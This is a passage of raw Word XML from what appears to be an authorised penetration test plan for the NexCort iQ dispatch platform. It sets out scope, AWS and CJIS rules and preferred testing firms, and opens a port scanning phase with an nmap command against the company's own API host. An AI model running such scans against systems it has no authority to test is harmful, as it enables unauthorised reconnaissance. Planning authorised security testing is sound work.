          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RC-owned AWS accounts (with AWS pen test notification)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Marketing site — www.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ring integration endpoints — /api/integrations/ring/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QR/NFC ingest endpoint — /api/report/* (with synthetic test codes only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP ingest endpoint — /api/cad/cap/ingest/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Production agency data — any real dispatch center's incidents, recordings, or PII</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS infrastructure shared with other customers (EC2 hypervisor layer, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-party systems not owned by NexCort iQ (Ring's servers, Amazon servers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DoS/DDoS attacks of any kind — even against staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical access testing of AWS data centers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering of agency customer employees without their agency's written consent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Penetration Testing Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS permits penetration testing of customer-owned resources without prior approval for the following services: EC2, RDS, Lambda, API Gateway, CloudFront, Aurora, and Elastic Beanstalk. Network stress testing, DNS zone walking, and port flooding require AWS approval via the AWS Vulnerability Reporting form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File AWS support request under 'Security' before any network scanning or load-testing that could trigger AWS abuse detection. Include start/end dates, source IPs, and target account ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS Compliance Requirement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ serves agencies subject to the FBI CJIS Security Policy v5.9. Section 5.10 (Security Assessment) requires:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing as part of the security assessment process for systems accessing CJI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tests conducted by qualified, independent personnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Results documented and remediated within defined timeframes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical findings remediated within 30 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment results reviewed by agency Information Security Officers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Preferred firms with CJIS penetration testing experience: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60"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Specialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Coalfire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CJIS, FedRAMP, public sector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Preferred for CJIS-specific engagements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tevora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Public safety, law enforcement tech</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Experience with CAD/RMS systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bishop Fox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Web apps, cloud infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Strong AWS expertise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rapid7 MDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Managed detection + pen test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Good for ongoing retainer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NCC Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Strong for transit/hospital verticals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Network Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network port scanning identifies open ports, running services, and exposed software versions on NexCort iQ infrastructure. This phase maps the external attack surface before any exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover all externally accessible services, identify unexpected open ports, and detect outdated software versions with known CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Tool — Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Full TCP scan with service version detection and default scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -p- api.rapidcortex.us -oA rc-api-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># UDP scan — often overlooked, catches DNS amplification and SNMP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
